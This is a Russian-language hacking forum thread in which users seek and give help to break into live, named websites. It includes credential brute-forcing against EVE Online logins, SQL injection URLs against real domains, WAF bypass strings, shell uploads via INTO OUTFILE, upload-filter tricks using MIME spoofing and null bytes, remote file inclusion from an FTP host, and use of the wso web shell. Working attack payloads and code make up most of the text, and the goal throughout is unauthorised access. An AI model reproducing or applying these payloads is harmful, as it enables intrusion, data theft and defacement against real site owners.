Дано: веб-морда для логина https://www.eveonline.com/login.asp

список вида логин:пасс

Нужно: программа, умеющая работать с таким видом брутфорса через прокси.

Насколько я понял, WBF не имеет функции перебора по такому списку, а иных возможных вариантов не знаю.

P.S. Также есть альтернативная веб-морда https://gate.eveonline.com/LogOn но её стоит использовать только в качестве резервной т.к. она, по всей видимости, более медленная.

PHPLIVE 3.2.2

Есть доступ к админке, но сделана она параноиком, фильтруется там все, что можно.

Есть два интересных момента.

Первый:


PHP:
if ($action=="upload_logo")

{

$pic_name=$_FILES['pic']['name'] ;

$now=time() ;

$filename=eregi_replace(" ","_",$pic_name) ;

$filename=eregi_replace("%20","_",$filename) ;

$filesize=$_FILES['pic']['size'] ;

$filetype=$_FILES['pic']['type'] ;

if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

$filename=$_POST['logo_name']."_$now.$extension";

if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

chmod("../web/$session_setup[login]/$filename",0777) ;

if ($_POST['logo_name'] =="LOGO")

{

if (file_ exists("../web/$session_setup[login]/$LOGO") &&$LOGO)

unlink("../web/$session_setup[login]/$LOGO") ;

$LOGO=$filename;

}



Не вижу вариантов обхода фильтра...

Второй ($COMPANY_NAME задается пользователем):


PHP:
functionUtil_Format_CleanVariable($string)

{

// take out common malicious characters that are

// typically NOT used on standard inputs

$string=preg_replace("/[$#;?]|(eval\()|(eval +\()|(char\()|(char +\()|(exec\( )|(exec +\()/i","",trim(rtrim($string) ) ) ;

return$string;

}

$COMPANY_NAME=addslashes(Util_Format_CleanVariable ($COMPANY_NAME) ) ;



$conf_string="0LEFT_ARROW0?php

\$LOGO = '$LOGO' ;

\$COMPANY_NAME =� �'$COMPANY_NAME' ;

\$SUPPORT_LOGO_ONL INE = '$SUPPORT_LOGO_ONLINE' ;

\$SUPPORT_LOGO_OFF LINE = '$SUPPORT_LOGO_OFFLINE' ;

\$SUPPORT_LOGO_AWA Y = '$SUPPORT_LOGO_AWAY' ;

\$VISITOR_FOOTPRIN T = '$VISITOR_FOOTPRINT' ;

\$THEME = '$THEM E' ;

\$POLL_TIME = '$ POLL_TIME' ;

\$INITIATE = '$I NITIATE' ;

\$INITIATE_IMAGE = '$INITIATE_IMAGE' ;

\$IPNOTRACK = '$ IPNOTRACK' ;

\$LANG_PACK = '$ LANG_PACK' ;?0RIGHT_ARROW0";

$conf_string=preg_replace("/0LEFT_ARROW0/","",$conf_string) ;

$fp=fopen("../web/$session_setup[login]/$session_setup[login]-conf-init.php","wb+") ;

fwrite($fp,$conf_string,strlen($conf_string) ) ;

fclose($fp) ;



eval просто заменяется на альтернативу, а вот что делать с экранированием кавычек, ";" и т.д.? Безнадежный случай?

Есть такая уязвимость в админке:

http://100kotlov.ru/admin/?alert(/ololo/)

После http://100kotlov.ru/admin/? любой html код или javascript.

Можно ли залить как-нибудь шелл?

Где можно найти такой скрипт?Хочу посмотреть на него изнутри.

xxddz said:
Есть такая уязвимость в админке:
http://100kotlov.ru/admin/?alert(/ololo/)
После http://100kotlov.ru/admin/? любой html код или javascript.
Можно ли залить как-нибудь шелл?
Где можно найти такой скрипт?Хочу посмотреть на него изнутри.


Если уже есть доступ в админку, то никак. Если нету, то можно его получить(XXS). "Эта вставка HTML, через неё шелл не зальёш.

Nek1t said:
PHPLIVE 3.2.2
Есть доступ к админке, но сделана она параноиком, фильтруется там все, что можно.
Есть два интересных момента.
Первый:

PHP:
if ($action=="upload_logo")

{

$pic_name=$_FILES['pic']['name'] ;

$now=time() ;

$filename=eregi_replace(" ","_",$pic_name) ;

$filename=eregi_replace("%20","_",$filename) ;

$filesize=$_FILES['pic']['size'] ;

$filetype=$_FILES['pic']['type'] ;

if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

$filename=$_POST['logo_name']."_$now.$extension";

if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

chmod("../web/$session_setup[login]/$filename",0777) ;

if ($_POST['logo_name'] =="LOGO")

{

if (file_ exists("../web/$session_setup[login]/$LOGO") &&$LOGO)

unlink("../web/$session_setup[login]/$LOGO") ;

$LOGO=$filename;

}



Не вижу вариантов обхода фильтра...


В переменную $_FILES['pic']['type'] подставляем слово JPEG (MIME-Тип(Tamper Data)).

В переменную $_POST['logo_name'] пишем название шелла(shell.php) Заполняя конец NUL-байтом.

Ну и если в папке разрешено выполнение PHP скироптов(php3, php4, php5, php, phtml...), в теории мы должны получить шелл.

Во втором случае, если бы параметр не обрамлялся одинарными кавычками, возможно было бы использовать обратные кавычки.

NULL-байт, к сожалению, экранируется.

XAMEHA said:
В переменную $_FILES['pic']['type'] подставляем слово JPEG (MIME-Тип(Tamper Data)).
В переменную $_POST['logo_name'] пишем название шелла(shell.php) Заполняя конец NUL-байтом.


Этот вариант с null байтом срабатывает довольно редко.

Но все это натолкнуло меня на одну мысль, если я не прав, тогда исправьте.

Вот здесь делаеться замечательная проверка:


PHP:
if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

Но что если ниодно из условий не выполниться? - $extension не перезапишется. Мы можем сделать так, что бы в переменной $_FILES['pic']['type'] не оказалось подстрок gif и jpeg и с помощью GET параметров указать значение $extension вот так:


http://site.ru/.../script.php?
extension=php


Мы снова должны получить шелл.

Зависимость: register_globals=on

есть запрос на заливку такого типа:

+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+

там где /tmp/1.txt фильтруется, что сдесь можно придумать?

кавычки не фильтруются и не экранируются, load_file() так же работает нормально.

Chrome~ said:
Этот вариант с null байтом срабатывает довольно редко.
Но все это натолкнуло меня на одну мысль, если я не прав, тогда исправьте.
Вот здесь делаеться замечательная проверка:

PHP:
if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

Но что если ниодно из условий не выполниться? -
$extension
не перезапишется. Мы можем сделать так, что бы в переменной
$_FILES['pic']['type']
не оказалось подстрок
gif
и
jpeg
и с помощью GET параметров указать значение
$extension
вот так:
Мы снова должны получить шелл.
Зависимость:
register_globals=on



Проверка происходит здесь


PHP:
if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

попугай said:
Проверка происходит здесь

PHP:
if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{



Да, правильно, не досмотрел. Я позже нашел исходный код этого скрипта. Даже если бы не было проверки, все равно вариант не сработал бы, так как в полной версии увидел, что происходит инициализация переменных.

winstrool said:
есть запрос на заливку такого типа:
+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+
там где /tmp/1.txt фильтруется, что сдесь можно придумать?
кавычки не фильтруются и не экранируются, load_file() так же работает нормально.


Так что фильтруется? Я не понял

ZARO said:
Так что фильтруется? Я не понял


%69nto+%6futfile+'[то что находится сдесь]'+--+

winstrool said:
есть запрос на заливку такого типа:
+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+
там где /tmp/1.txt фильтруется, что сдесь можно придумать?
кавычки не фильтруются и не экранируются, load_file() так же работает нормально.


я не думаю, что там какая-то регулярка, которая вырезает данные между кавычками. Явно в чём-то другом проблема.

Melfis said:
я не думаю, что там какая-то регулярка, которая вырезает данные между кавычками. Явно в чём-то другом проблема.


угу) я тоже так думаю. лучше поделись ссылкой

2 колонки, версию и тп выводит нормально, хочу вывести названия таблиц и выводит ошибку

http://www.tmgrupo.ru/info.php?id_article=-5+union+select+table_name,2+from+information_schem a.tables--+

почему?

qaz said:
2 колонки, версию и тп выводит нормально, хочу вывести названия таблиц и выводит ошибку
http://www.tmgrupo.ru/info.php?id_article=-5+union+select+table_name,2+from+information_schem a.tables--+
почему?


потому что это 4ая ветка. в ней нет information_schema

d1v said:
потому что это 4ая ветка. в ней нет information_schema


понял, спасибо,

вот ещо вопрос

я хотел попробовать залить шелл как написано в статье

http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+

но ничего не получилось, почему?

qaz said:
понял, спасибо,
вот ещо вопрос
я хотел попробовать залить шелл как написано в статье
http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+
но ничего не получилось, почему?


потому что путь до 1.php должен быть полный, а не относительный - это первое что, бросилось в глаза.

во-вторых залить шелл ты можешь только в папку доступную на запись (с) К.О.

ну и magic quotes должны быть off.

qaz said:
понял, спасибо,
вот ещо вопрос
я хотел попробовать залить шелл как написано в статье
http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+
но ничего не получилось, почему?


magic_quotes. Тобишь кавычки фильтруются.

На уровне веб-сервера фильтруется сочетание INFORMATION_SCHEMA.TABLES. Можно как-то обойти с помощью тонкостей синтаксиса MySQL?


script.php?id=5+UNION(SELECT(1),(2),(3),(4),(5),(6 )FROM(INFORMATION_SCHEMA.TABLES))--

Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj

Nek1t said:
На уровне веб-сервера фильтруется сочетание INFORMATION_SCHEMA.TABLES. Можно как-то обойти с помощью тонкостей синтаксиса MySQL?


ну если магические ковычки офф, то поставь information_schema.`tables`

`information_schema`.`tables`

`information_schema`.tables

d1v said:
потому что путь до 1.php должен быть полный, а не относительный - это первое что, бросилось в глаза.
во-вторых залить шелл ты можешь только в папку доступную на запись (с) К.О.
ну и magic quotes должны быть off.


хорошо, тогда ешо два вопроса, как можо узнать полный путь если он например в ошибке не указывается

и

как узнать достапна папка на запись или нет, или как искать доступные для записи папки?

/srv/www/velotaxi.de/htdocs/php/subnav.php

вот он путь то. Узнать путь - смотреть соседние сайты к примеру и пытаться у них вызвать ошибку / залить шелл.

Узнать права на запись - попробовать собсна залить. Мож к картинкам каким сможешь залить. Посмотри ссылки на сайте или сканером диров каким-нить воспользуйся. Тебе ещё забыли сказать, у тя должны быть права файловые под юзером бд.

qaz said:
хорошо, тогда ешо два вопроса, как можо узнать полный путь если он например в ошибке не указывается
и
как узнать достапна папка на запись или нет, или как искать доступные для записи папки?


ну как это в ошибке не указыается?


Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33

папку ищи логически) в какую папку может быть разрешена запись? правильно - в ту, в которую что-то загружают. это могут быть картинки, аватарки, документы и т.д.

можно залить в папку tmp в корне сервера, которая в 99% доступна на запись и оттуда уже проинклудить (при наличии инклуда конечно)

d1v said:
ну как это в ошибке не указыается?

Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33

папку ищи логически) в какую папку может быть разрешена запись? правильно - в ту, в которую что-то загружают. это могут быть картинки, аватарки, документы и т.д.
можно залить в папку tmp в корне сервера, которая в 99% доступна на запись и оттуда уже проинклудить (при наличии инклуда конечно)



А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?

попугай said:
А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?


что бы человек понял и впредь у него подобных вопросов не вознивало. наверное для этого.

Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.

Вот и возник вопрос..

Как можно дампнуть таблицу с колонками самым быстрым способом?

swad said:
Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.
Вот и возник вопрос..
Как можно дампнуть таблицу с колонками самым быстрым способом?


заюзай автоинжектеры какие-нить. sqlihelper, havij, mysqli dumper, etc

swad said:
Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.
Вот и возник вопрос..
Как можно дампнуть таблицу с колонками самым быстрым способом?


Можно вывести всё сразу, одним запросом. Если конечно нет огранечений, и сервер не зависнет: /showpost.php?p=2298777&postcount=16 (https://antichat.live/showpost.php/p/2298777/postcount/16/)

d1v said:
ну как это в ошибке не указыается?

Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33



не, я не имею в виду етот случай, если вдруг например не указывается, то как ещо можно узнать?


попугай said:
А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?


а можно поинтерисоватся, а как вы об етом узнали?

чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv

alexvrn said:
Как обойти проверку файлов на формат и залить php
config.php

Code:
$Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','as cx','jsp','cfm','cfc','pl','bat','exe','dll','reg' ,'cgi') ;



Пропустили php4. Если на сервере установлены дополнительные яп/в application/x-httpd-php прописано нестандартное расширение - можно воспользоваться этим.

Мы можем пройти эту проверку:


PHP:
if ( (count($arAllowed) >0&& !in_array($sExtension,$arAllowed) ) || (count ($arDenied) >0&&in_array($sExtension,$arDenied) ) )SendResults(' 202') ;

Если напишем в переменную $_GET['Type'] то, что не предусматривает разработчик(Например '!!!'). И соответственно зальём шелл.

winstrool said:
чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv


а можешь показать как ето делать на примере, например тут

http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--

http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+

Только у тя прав нету файловых

И вообще, по теме залива шелла через мускульную инъекцию дохрена написано. Не проще почитать всё разом, чтобы усвоить всё сразу? Тебе ж выше в куче постов всё подробно разжевали что и как.

Melfis said:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+
Только у тя прав нету файловых


што дебе дало знать што прав нету? и што бы я увидел если бы они были?

qaz said:
што дебе дало знать што прав нету? и што бы я увидел если бы они были?


Подними у ся вебсервер, сделай какой-нить простой скрипт с выборкой из базы и принимаемым параметром от юзвера. И собсна потесть. В основном при установке ты будешь под рутом, у которого есть file_priv - там и увидишь что и как.

Если прав нету, то ничего не выводится. Если есть - содержимое файла ;-(

зы. разве в пхп можно через echo выводить массив? Но тут может я ошибаюсь...

qaz said:
ну сделал
сам скрипт

PHP:




сделал как ты показывал, увидел тотже вывод
http://mai1-ru.h2m.ru/index.php?id=4'+union+select+(select+load_file('/usr/home/mai1-ru/htdocs/index.php'))--+
што я должен из етого понять? непойму


У себя сервер, где ты будешь под рутом, а не на хостинге. Так же убедись, что путь с файлом существует.

qaz said:
а можешь показать как ето делать на примере, например тут
http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--




http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=0x67625F6D69726F626F6577--+


четыре

http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us %20er+where+user=0x67625F6D69726F626F6577--+


Тогда уж так:


http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=user()--+

XAMEHA said:
Тогда уж так:


просто я извращенец

У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876

С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.

Sc0rpi0n said:
Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj


Помогите плиз

Sc0rpi0n said:
Помогите плиз


как бэ Script for BSQL by Grey (http://zalil.ru/31393989)

Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию).

Все бы хорошо, но:


EXECUTE permission denied on object 'xp_cmdshell'


Как можно повысить себе права? Можте кто-то уже делал запрос?

Читал мануалы по мсскл, но не вкурил =(

Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263

Sc0rpi0n said:
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263


http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+

Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)


Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+

Sc0rpi0n said:
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)

Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+





Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+

Expl0ited said:

Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+



ты чё КЭП??

смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+

Sc0rpi0n said:
ты чё КЭП??
смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+




Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,(select (table_name)from(information_schema.columns)limit+ 1))--+

Иногда, достаточно просто подумать.

Такой вопрос...

Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y

На самом сайте не могу найти директорию для что бы залить файл... там же есть

SquirrelMail version 1.4.15

Нашол директорию где он лежит...

Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?

GroM88 said:
Такой вопрос...
Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
На самом сайте не могу найти директорию для что бы залить файл... там же есть
SquirrelMail version 1.4.15
Нашол директорию где он лежит...
Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?


Заливай в /tmp и ищи инклюд.

FlaktW said:
Заливай в /tmp и ищи инклюд.


нет инклуда = \

На сайте есть phpmyadmin, Логины и пассы к бд повыдирал из конфигов... но на pma стоит вебавторизация, логины и пассы от бд не подходят = \ .htaccess, .htpasswd в директории пма нет или же я не могу прочитать их там) хотя визде htacces читается!

GroM88 said:
Такой вопрос...
Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
На самом сайте не могу найти директорию для что бы залить файл... там же есть
SquirrelMail version 1.4.15
Нашол директорию где он лежит...
Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?


а поискать конфиг не?

/thread49775.html

Помогите разобраться с уязвимостью

http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27

нашел уязвимость, не могу ее заюзать, помогите.

sam367 said:
http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
нашел уязвимость, не могу ее заюзать, помогите.


Инъекция есть, но раскрутить не удастся.

sam367 said:
http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
нашел уязвимость, не могу ее заюзать, помогите.


Там нет уязвимости

HAXTA4OK said:
а поискать конфиг не?
/thread49775.html


Ты бы мне шептанул какой конфиг искать?)

P.S. Этим топиком постоянно пользуюсь )

Вопрос про способ заливки шелла

Есть вот такой тип админки, http://www.whatshappening.sg/admin

В ТЕМЕ НЕЛЬЗЯ ПОСТИТЬ ЛОГИНЫ И ПАРОЛИ ВО ИЗБЕЖАНИЕ ДЕФЕЙСОВ

прошу прощения,

тогда вот ссылка на продукт(календарь Helios Calendar )

http://www.refreshmy.com/documentation/?title=Helios

может кто сталкивался с таким?

Как ни старался, не могу придумать как залить туда шелл

Требуется помощь.

помогите заюзать скулю, чет у меня не пляшет ниче

http://www.czechstreets.com/?p=tour&start=5'

pirat0 said:
помогите заюзать скулю, чет у меня не пляшет ниче
http://www.czechstreets.com/?p=tour&start=5'


Заюзать скулю, не удастся

FlaktW said:
Заюзать скулю, не удастся


почему??

там в конец кода каким то чудесним образом попадает 7, как ее убрать??

pirat0 said:
помогите заюзать скулю, чет у меня не пляшет ниче
http://www.czechstreets.com/?p=tour&start=5'


Там нет уязвимости, переменная start попадает в значение LIMIT, а LIMIT в свою очередь стоит после ORDER BY. В таком варианте провести инъекцию не возможно.

http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--

Есть че для обхода WAF?

попугай said:
http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--
Есть че для обхода WAF?


прогнался ручками не че не получается, запустил в хэвиджь определил как блинд и подобрал БД, дальше не стал крутить...

P.S.: DB: fullhyd_ascicug

Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords

Sc0rpi0n said:
Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords




PHP:
SELECT column_name FROM information_schema.colu mns WHERE column_name LIKE'%pas%'

Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?


HTML:
http://engineer.asu.edu/feed-item?page=7

expupkin said:
Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?

HTML:
http://engineer.asu.edu/feed-item?page=7



скуля, раскрытие путей

erolom said:
скуля, раскрытие путей




HTML:
http://engineer.asu.edu/feed-item?page=1'

Почему же так она не пашет ?

erolom said:
скуля, раскрытие путей


инъекции там нет. просто кривости настройки.

Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?

Bramin said:
Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?


Пароль убери.

Ups said:
Пароль убери.


залить повторно шелл нет возможности, дыру прикрыли...есть еще варианты?

p.s оказалось вариант есть через локальный инклуд,

вылетов нет

можно ли обойти проверку в is_dir


PHP:
if (@is_dir($_COOKIE['abcd']) {$config=$_COOKIE['abcd']; }

то есть проверку на директорию

допустим нужно задать такой путь

abcd = /home/www/sell.gif

ysmat said:
можно ли обойти проверку в is_dir

PHP:
if (@is_dir($_COOKIE['abcd']) {$config=$_COOKIE['abcd']; }

то есть проверку на директорию
допустим нужно задать такой путь
abcd = /home/www/sell.gif


Возможно.

Если строка переданная в is_dir, будет наполовину обрезана нулл-байтом, а функция в которую она будет помещена, не будет его считать(Или он после будет убираться) то возможно вставить любой путь.


Code:
/home/www/%00sell.gif

Ну и ещё один вариант:

Если переменная далее будет помещена в функцию, не добавляя к ней ничего в начале(Возможно и добавляя, зависит от кода), и добавляя префикс в конце, а функция будет наподобие той, которая работает с файлами, то возможно будет передать удалённую директорию, например по протоколу FTP:


PHP:
$_COOKIE['abcd'] ='ftp://10.0.0.1/';

//-----------

if (@is_dir($_COOKIE['abcd'])

{

include($_COOKIE['abcd'].'shell.php');//Возможны и другие функции , будет лучше если привед� �шь полный код

//Ну разумеется на настройк и php.ini тоже следует обрат� �ть внимание

}

Даже если в данной ситуации путь будет неизвестен, то будет возможно запрограммировать сервер что бы передавал нужный ко по любому запросу.

продолжение кода


PHP:
ROOT_DIR// усатановачный путь скрип та

$tpl= newdle_template( );// не совсем понимаю что эт о $tpl не просто переменная а обьект?

$tpl->dir=ROOT_DIR.'/templates/'.$config;// какое-то хитрое обращение к нем у вроде бы полность собир аеться путь

include_once$tpl->dir.'/login.tpl';// собственно сам инклюд

ysmat said:
продолжение кода

PHP:
//-----------

if (@is_dir($_COOKIE['abcd'])

{

$config=$_COOKIE['abcd'];

$tpl= newdle_template( );// Создание объекта $tpl из к ласса dle_template.

$tpl->dir=ROOT_DIR.'/templates/'.$config;// Сбор пути в одну перемен ную

include_once$tpl->dir.'/login.tpl';// Ну и собственно сам инкл юд

}





Безнадёжная ситуация, но не совсем

1. Если у вас есть доступ у одному каталогу на сервере, и этот скрипт тоже туда имеет доступ, то можно туда залить файл login.tpl, а тут его проинклудить(Даже если там нет прав на выполнение, и файлы обрезаны .htaccess). - Это различные файлообменники, uploader'ы и т. д.

2. Зарегистрировать себе сайт на этом-же хостинге(и сервере), в каталоге /tmp или любом другом, который доступен для всех создать произвольную папку и файл login.tpl, и в переменную $_COOKIE['abcd'] подставить путь к нему, относительно данного сервера.

Но если это не весь код, а просто участки кода из DLE:


PHP:
if ($category_skin!="") {

$category_skin=trim(totranslit($category_skin,fals e,false) );

if ($category_skin!=''AND @is_dir(ROOT_D IR.'/templates/'.$category_skin)) {

$config['skin'] =$category_skin;

}

} elseif (isset ($_REQUEST['action_skin_change'] )) {



$_REQUEST['skin_name'] =trim(totranslit($_REQUEST['skin_name'],false,false) );

echo"!".$_REQUEST['skin_name'];

if ($_REQUEST['skin_name'] !=''AND @is_dir(ROOT_DIR.'/templates/'.$_REQUEST['skin_name'] ) ) {

$config['skin'] =$_REQUEST['skin_name'];

set_cookie("dle_skin",$_REQUEST['skin_name'],365);

}

} elseif (isset ($_COOKIE['dle_skin'] ) ) {

$_COOKIE['dle_skin'] =trim(totranslit($_COOKIE['dle_skin'],false,false) );

if ($_COOKIE['dle_skin'] !=''AND @is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin'] )) {

$config['skin'] =$_COOKIE['dle_skin'];

}

}



PHP:
functiontotranslit($var,$lower=true,$punkt=true) {

global$langtranslit;

if (is_array($var) ) return"";

if (!is_array($langtranslit) OR !count( $langtranslit) ) {

$langtranslit= array(

'а'=>'a','б'=>'b','в'=>'v',

'г'=>'g','д'=>'d','е'=>'e',

'ё'=>'e','ж'=>'zh','з'=>'z',

'и'=>'i','й'=>'y','к'=>'k',

'л'=>'l','м'=>'m','н'=>'n',

'о'=>'o','п'=>'p','р'=>'r',

'с'=>'s','т'=>'t','у'=>'u',

'ф'=>'f','х'=>'h','ц'=>'c',

'ч'=>'ch','ш'=>'sh','щ'=>'sch',

'ь'=>'','ы'=>'y','ъ'=>'',

'э'=>'e','ю'=>'yu','я'=>'ya',

"ї"=>"yi","є"=>"ye",



'А'=>'A','Б'=>'B','В'=>'V',

'Г'=>'G','Д'=>'D','Е'=>'E',

'Ё'=>'E','Ж'=>'Zh','З'=>'Z',

'И'=>'I','Й'=>'Y','К'=>'K',

'Л'=>'L','М'=>'M','Н'=>'N',

'О'=>'O','П'=>'P','Р'=>'R',

'С'=>'S','Т'=>'T','У'=>'U',

'Ф'=>'F','Х'=>'H','Ц'=>'C',

'Ч'=>'Ch','Ш'=>'Sh','Щ'=>'Sch',

'Ь'=>'','Ы'=>'Y','Ъ'=>'',

'Э'=>'E','Ю'=>'Yu','Я'=>'Ya',

"Ї"=>"yi","Є"=>"ye",

);

}



$var=trim(strip_tags($var) );

$var=preg_replace("/\s+/ms","-",$var);

$var=strtr($var,$langtranslit);

if ($punkt)$var=preg_replace("/[^a-z0-9\_\-.]+/mi","",$var);

else$var=preg_replace("/[^a-z0-9\_\-]+/mi","",$var);

$var=preg_replace('#[\-]+#i','-',$var);

if ($lower)$var=strtolower($var);

$var=str_ireplace(".php","",$var);

$var=str_ireplace(".php",".ppp",$var);

if(strlen($var) >200) {



$var=substr($var,0,200);



if( ($temp_max=strrpos($var,'-')) )$var=substr($var,0,$temp_max);



}



return$var;

}

Там нет уязвимостей, поскольку функция totranslit всё надёжно вырезает.

в моей версии в init.php totranslit не вызываеться

по факту все спец символы проходят

/threadnav52195-8-10.html

проблема только в @is_dir

есть sql-inj

у меня есть доступ к определённой базе sql, но на сервере есть ещё базы, могу ли я каким-нибудь образом получить к ним доступ? (знаю названия таблиц и колонок)

Нет.

ysmat said:
в моей версии в init.php totranslit не вызываеться
по факту все спец символы проходят
/threadnav52195-8-10.html
проблема только в @is_dir


Если конечно данного кода там тоже нет(Поставлен print вместо die):


PHP:
$url=html_entity_decode(urldecode($_SERVER['QUERY_STRING'] ) );

$url=str_replace("\\","/",$url);



if($url) {



if( (strpos($url,'') !==false) || (strpos($url,'"') !==false) || (strpos($url,'./') !==false) || (strpos($url,'../') !==false) ||(strpos($url,'\'') !==false) || (strpos($url,'.php') !==false) ) {

if($_GET['do'] !="search"or$_GET['subaction'] !="search") print("Hacking attempt!");

}



}



$url=html_entity_decode(urldecode($_SERVER['REQUEST_URI'] ) );

$url=str_replace("\\","/",$url);



if($url) {



if( (strpos($url,'') !==false) || (strpos($url,'"') !==false) || (strpos($url,'\'') !==false) ) {

if($_GET['do'] !="search"or$_GET['subaction'] !="search") print("Hacking attempt!");



}



}



И соблюдены пункт 1 или 2, или есть шелл на соседе(Или можно создать произвольный файл тут, или в темпе), то да. Ссылку в ПМ.

SergioRezza said:
есть sql-inj
